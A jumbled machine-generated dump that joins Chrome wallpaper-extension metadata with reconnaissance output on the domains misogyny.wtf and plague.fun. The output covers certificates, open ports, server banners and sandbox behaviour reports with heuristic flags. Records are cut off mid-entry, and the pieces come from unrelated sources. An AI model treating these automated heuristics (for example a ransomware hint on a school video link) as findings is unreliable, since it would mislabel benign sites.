"https://lh3.googleusercontent.com/U37Bdee8tejEzgCfbkF51-OLn6ENkBDJvHobXQLQG0hDXCyxQVHIZ8LffkazMFHdpZJJqp4XSbooLtSKGmgvmebncQs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 36, "name": "PUBG HD Wallpapers New Tab Theme"}, "bhnklgpilfifbkahialpmbnhmpoaiomh": {"rating": 3.7777777, "users": 0, "platform": "", "short_description": "The Simpsons wallpapers extension offers great images with every new tab and was made for all fans of Simpsons.", "icon": "https://lh3.googleusercontent.com/oGZpMcoYYMqEocHdrSNjmlNd_fjhOPUZE-3XZw6zRTa4n2rlYn8OWUGT7v2A_lJps7K4KpjQGSAzdBzEaspSAxCYQhA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "The Simpsons 4K Wallpapers New Tab"}, "cadippdoonnecjfembbfokijpncaiefh": {"rating": 3.5089285, "users": 3000, "platform": "", "short_description": "Easter wallpapers extension offers great images with every new tab and was made for all fans of Easter.", "icon": "https://lh3.googleusercontent.com/-pcJqD8Bf8eTrfQ0S58g3FO29D1OqhWZmKRcZzd4FriR60v1xlIZwhU-yKoGx_tOLCEy97QVIukcsX_OxbztNVPNAA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 112, "name": "Easter HD Wallpaper New Tab"}, "khiclbcknnlgfglgablmakmkhpnclolo": {"rating": 3.0769231, "users": 443, "platform": "", "short_description": "PUBG Battle Royale wallpapers extension offers great images with every new tab and was made for all fans of PUBG.", "icon": "https://lh3.googleusercontent.com/PSigIBqr7dDCtEnN-xQ9DfASfpO-qdYWFcpf0WYRNEyy_tlFCpaguFXk5ahrW_L4yNe6SHQwM2mnMYnGQStollZlcLM=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13, "name": "PUBG Battle Royale HD Wallpapers New Tab"}}, "manifest": {"update_url": "https://clients2.google.com/service/update2/crx", "description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "icons": {"128": "icon128.png", "32": "icon32.png", "48": "icon48.png", "16": "icon16.png"}, "chrome_url_overrides": {"newtab": "newtab.html"}, "background": {"scripts": ["background.js"]}, "version": "0.37", "manifest_version": 2, "permissions": ["webNavigation", "tabs", "https://home.newtabgallery.com/*"], "browser_action": {"default_icon": {"32": "icon32.png", "16": "icon16.png"}, "default_title": "Plague Inc HD Wallpapers New Tab Theme"}, "name": "Plague Inc HD Wallpapers New Tab Theme"}}, "extension_id": "lgglnjfaglblnglkdmmdhmjcpplmjdfj"}, {"platform": "Chrome", "version": "1.0.2", "data": {"entrypoints": {"chrome.tabs.query": {"/tmp/lgglnjfaglblnglkdmmdhmjcpplmjdfj_1.0.2/newtab.js": [3]}}, "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2021-12-22", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "" 2022-12-18 00:07:19 HTTP Status Code No Web Spider 0 0 3 0 None 200 http://misogyny.wtf:2020/css/parser.css 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2052 188.114.97.1 2022-12-18 00:06:07 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:d6:9e:d2:88:e9:c1:89:74:28:65:2d:6e:88:09:50:9f:4f Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 23 20:47:28 2022 GMT Not After : Oct 21 20:47:27 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e2:0d:a7:a1:bf:81:84:fe:a2:ff:8d:36:67:3d: 94:76:0b:74:ea:c9:c4:15:da:67:48:de:38:52:f4: 66:f1:cf:58:f5:ed:3b:fb:e6:93:95:6d:62:df:c4: e1:a5:f5:b7:4f:c3:28:52:2d:05:bb:ed:9b:1c:5a: e7:bc:37:9b:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 4E:89:67:D2:CE:A1:37:68:F8:76:14:2C:47:E7:EC:A8:A1:05:92:71 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:31:00:f5:9a:74:88:68:99:22:03:d6:91:70:83:d9: b3:f5:1d:ac:7e:f1:78:f9:c4:0e:47:4f:80:11:6c:43:f5:51: 80:08:05:0b:44:92:ff:35:92:09:bc:aa:c7:a5:ad:98:9b:02: 30:11:d1:8b:02:89:a9:55:4e:fa:1e:63:01:dd:1c:92:d3:03: 99:e5:5f:ad:f4:fb:2f:0f:19:cc:c1:31:98:97:36:b1:c3:97: 96:91:aa:01:42:36:42:ec:0a:5f:82:af:53 2022-12-18 00:18:19 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.7:80 188.114.97.0/24 2022-12-18 00:22:14 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2e68629bd2d58-ORD Content-Encoding: gzip 172.67.169.215 2022-12-18 00:25:06 Physical Location No MetaDefender 0 0 1 0 None Zuerich, Switzerland 51.103.210.236 2022-12-18 00:21:13 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b1356f9f1a22f3-ORD 188.114.97.0 2022-12-18 00:18:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.11:8080 188.114.97.0/24 2022-12-18 00:12:00 Physical Location No ipapi.co 1 0 1 0 None Zurich, Zurich, ZH, Switzerland, CH 51.103.210.236 2022-12-18 00:05:02 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://www.schooltube.com/media/t/1_m2o42vv0', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c5c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_c5c_IE_EarlyTabStart_0xcb4_Mutex"\n "IsoScope_c5c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c5c_IESQMMUTEX_0_331"\n "IsoScope_c5c_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c5c_ConnHashTable<3164>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3164"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"192.58.252.50:443"\n "151.139.236.246:80"\n "52.201.188.11:80"\n "172.64.194.26:443"\n "99.84.238.47:443"\n "172.217.13.226:443"\n "172.217.164.138:443"\n "23.63.245.11:443"\n "184.26.80.228:443"\n "104.17.213.204:443"\n "13.35.126.201:80"\n "142.250.73.195:80"\n "13.35.126.192:80"\n "172.217.7.194:443"\n "99.84.226.197:443"\n "159.127.41.178:443"\n "134.209.129.254:443"\n "204.237.133.116:443"\n "74.118.184.100:443"\n "13.56.90.232:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-71', u'name': u'Sets a windows hook', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1179', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1179', u'relevance': 10, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" sets a global windows hook with filter "WH_MOUSE_LL"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "https://www.schooltube.com/media/t/1_m2o42vv0" (UID: 00065473-00003164)\n Spawned process "iexplore.exe" with commandline "SCODEF:3164 CREDAT:275457 /prefetch:2" (UID: 00065504-00001828)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sslcom.ocsp-certum.com"\n "ocsps.ssl.com"\n "o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "isrg.trustid.ocsp.identrust.com"\n "ocsp.godaddy.com"\n "ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "https://www.schooltube.com/media/t/1_m2o42vv0" (UID: 00065473-00003164)\n Spawned process "iexplore.exe" with commandline "SCODEF:3164 CREDAT:275457 /prefetch:2" (UID: 00065504-00001828)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "iexplore.exe" (UID: 00065473-00003164) was launched with new environment variables: "PATH="%PROGRAMFILES%\\Internet Explorer;""\n Process "iexplore.exe" (UID: 00065473-00003164) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"\n Process "iexplore.exe" (UID: 00065473-00003164) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "5_media_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Hook Detection', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1179', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1179', u'relevance': 10, u'threat_level': 0, u'type': 11, u'description': u'"iexplore.exe" wrote bytes "d04f74f3fe070000f01dc53f01000000101ec53f01000000e036c53f01000000501ec53f010000000000000000000000" to virtual address "0x3FC58000"\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0x3FC571C0"\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFDAD05A8" (part of module "OLEAUT32.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFD962390" (part of module "GDI32.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFB5618D0" (part of module "COMCTL32.DLL")\n "iexplore.exe" wrote bytes "4068d9f4fe070000" to virtual address "0xFD6FBEA8" (part of module "OLE32.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xF3F22D78" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "4068d9f4fe070000" to virtual address "0xFDFE1AF0" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "b062d9f4fe070000" to virtual address "0xFDFE1C30" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFDFE1F30" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFE995348" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "4068d9f4fe070000" to virtual address "0xFE995748" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "5069d9f4fe070000" to virtual address "0xF3F240E0" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "d060d9f4fe070000" to virtual address "0xFB561CC0" (part of module "COMCTL32.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFD6FBC38" (part of module "OLE32.DLL")\n "iexplore.exe" wrote bytes "b061d9f4fe070000" to virtual address "0xFE9955C0" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFD041318" (part of module "MSCTF.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFDAD0A30" (part of module "OLEAUT32.DLL")\n "iexplore.exe" wrote bytes "b062d9f4fe070000" to virtual address "0xFE9955B8" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xF3F23D50" (part of module "IEFRAME.DLL")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5_media_1_.bin" has type "data"\n "akamaiHDPlugin_1_.swf" has type "Macromedia Flash data (compressed) version 11"\n "urlblockindex_1_.bin" has type "data"\n "doubleClickPlugin_1_.swf" has type "Macromedia Flash data (compressed) version 14"\n "kdp3_1_.swf" has type "Macromedia Flash data (compressed) version 11"\n "259LO3T4.txt" has type "ASCII text"\n "8HX94XNC.txt" has type "ASCII text"\n "X3V3E8AoI9wAAGzuHGYAAABxAxkAAAIB_1_.gif" has type "GIF image data version 89a 1 x 1"\n "Y34Q5ZMD.txt" has type "ASCII text"\n "TB6DU83J.txt" has type "ASCII text"\n "NQA3I7XW.txt" has type "ASCII text"\n "DHOLH8J3.txt" has type "ASCII text with very long lines"\n "UD1NK7R3.txt" has type "ASCII text"\n "P0YJ9JZK.txt" has type "ASCII text"\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"\n "DU0TAQEJ.txt" has type "ASCII text"\n "78ZWUNLA.txt" has type "ASCII text"\n "prebid_1_.js" has type "ASCII text with very long lines"\n "bl-04a3385-0e6d5adc_1_.js" has type "ASCII text with very long lines"\n "A865H115.txt" has type "ASCII text with very long lines"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-2', u'name': u'Creates new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 8, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" is creating a new process (Name: "%PROGRAMFILES%\\(x86)\\Internet Explorer\\iexplore.exe"\n Handle: )'}, {u'category': u'Ransomware/Banking', u'origin': u'Binary File', u'identifier': u'binary-10', u'name': u'The input sample dropped very many files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'The input sample dropped 1047 files (often an indicator for ransomware)'}, {u'category': u'Network Rela 172.67.190.129 2022-12-18 00:09:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.8:8443 188.114.96.0/24 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.7.179 2022-12-18 00:02:50 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:6b:c5:5a:1c:aa:de:11:25:3a:85:ac:27:46:ac:84:c2:a9 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Oct 30 18:19:31 2022 GMT Not After : Jan 28 18:19:30 2023 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:01:01:6e:30:77:4b:4a:76:be:97:94:3e:d7:af: bb:89:fe:9f:c9:f2:e8:ed:d4:13:6a:74:bb:54:79: b8:27:6d:90:01:e0:be:5d:f9:e8:61:3e:d3:8e:13: 0b:c0:e3:b9:e9:81:3b:d6:d1:80:50:6a:0e:80:e2: e7:bc:d5:ec:5b ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: E9:2C:D8:38:4D:A7:AE:7E:D2:DB:0C:69:89:B1:06:B2:70:BB:A0:0E X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:31:00:8a:13:86:00:52:1a:c1:0d:64:4c:3a:d0:7d: ad:a3:1f:3d:77:c0:7b:e0:38:7d:8a:d1:13:d1:2c:4d:d8:d3: 55:c4:42:b5:2c:66:8f:c9:c6:58:d2:35:f0:54:a9:b1:fa:02: 30:03:c9:aa:f7:e7:41:d6:3c:a5:0a:5a:1b:57:5a:06:d4:2b: b1:c3:23:17:ba:be:0f:99:c0:9a:36:c9:f2:ce:f3:30:3e:9e: a0:05:0c:ae:61:ce:b0:e0:07:94:04:30:53 plague.fun 2022-12-18 00:05:56 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 22, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://mispost.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"mispost.repl.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "168.62.242.76:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:648:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:6148:120:WilError_01"\n "Local\\SM0:6148:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:648:120:WilError_01"\n "Local\\SM0:648:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:648:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7444:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\IndexedDB\\https_ntp.msn.com_0.indexeddb.leveldb\\000003.log]- [targetUID: 00000000-00000648]\n "shopping.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.html]- [targetUID: 00000000-00000648]\n "wallet-checkout-eligible-sites.json" has type "JSON data"- Location: [%TEMP%\\648_1384275148\\json\\wallet\\wallet-checkout-eligible-sites.json]- [targetUID: 00000000-00000648]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00000648]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00000648]\n "f_00023e" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1613x1075 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007500]\n "65d3b195-5abd-49d0-bacc-12ca36538e65.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\65d3b195-5abd-49d0-bacc-12ca36538e65.tmp]- [targetUID: 00000000-00000648]\n "b5766cee-9e73-4c07-a2e8-74621f089b4f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b5766cee-9e73-4c07-a2e8-74621f089b4f.tmp]- [targetUID: 00000000-00000648]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000648]\n "f_00023d" has type "UTF-8 Unicode text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007500]\n "ef427127-7108-49bf-8fb0-616e99e32003.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ef427127-7108-49bf-8fb0-616e99e32003.tmp]- [targetUID: 00000000-00000648]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.fingerprint]- [targetUID: 00000000-00000648]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000648]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\WebStorage\\QuotaManager-journal]- [targetUID: 00000000-00000648]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\648_1384275148\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00000648]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00000648]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00000648]\n "c6730105-9e3b-49aa-8033-dcd7d74d300c.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\c6730105-9e3b-49aa-8033-dcd7d74d300c.tmp]- [targetUID: 00000000-00000648]\n "a3ccc47b-8e06-443f-8fbb-866f47fad31b.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://mispost.repl.co/"\n Pattern match: "https://mispost.repl.co"\n Heuristic match: "mispost.repl.co"\n Heuristic match: "_mispost.rep|.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "wallet-drawer.bundle.js" - Location: [%TEMP%\\648_1384275148\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00000648]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\648_851660026\\edge_tracking_page_validator.js]- [targetUID: 00000000-00000648]\n Dropped file: "app-setup.js" - Location: [%TEMP%\\648_1384275148\\Wallet-Checkout\\app-setup.js]- [targetUID: 00000000-00000648]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\648_851660026\\shopping_iframe_driver.js]- [targetUID: 00000000-00000648]\n Dropped file: "notification.bundle.js" - Location: [%TEMP%\\648_1384275148\\Notification\\notification.bundle.js]- [targetUID: 00000000-00000648]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\648_851660026\\shoppingfre.js]- [targetUID: 00000000-00000648]\n Dropped file: "runtime.bundle.js" - Location: [%TEMP%\\648_1384275148\\runtime.bundle.js]- [targetUID: 00000000-00000648]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\648_437870075\\adblock_snippet.js]- [targetUID: 00000000-00000648]\n Dropped file: "crypto.bundle.js" - Location: [%TEMP%\\648_1384275148\\crypto.bundle.js]- [targetUID: 00000000-00000648]\n Dropped file: "tokenized-card.bundle.js" - Location: [%TEMP%\\648_1384275148\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00000648]\n Dropped file: "vendor.bundle.js" - Location: [%TEMP%\\648_1384275148\\vendor.bundle.js]- [targetUID: 00000000-00000648]\n Dropped file: "bnpl_driver.js" - Location: [%TEMP%\\648_1384275148\\bnpl_driver.js]- [targetUID: 00000000-00000648]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\648_851660026\\edge_checkout_page_validator.js]- [targetUID: 00000000-00000648]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\648_851660026\\auto_open_controller.js]- [targetUID: 00000000-00000648]\n Dropped file: "product_page.js" - Location: [%TEMP%\\648_851660026\\product_page.js]- [targetUID: 00000000-00000648]\n Dropped file: "wallet.bundle.js" - Location: [%TEMP%\\648_1384275148\\wallet.bundle.js]- [targetUID: 00000000-00000648]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\648_851660026\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00000648]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': 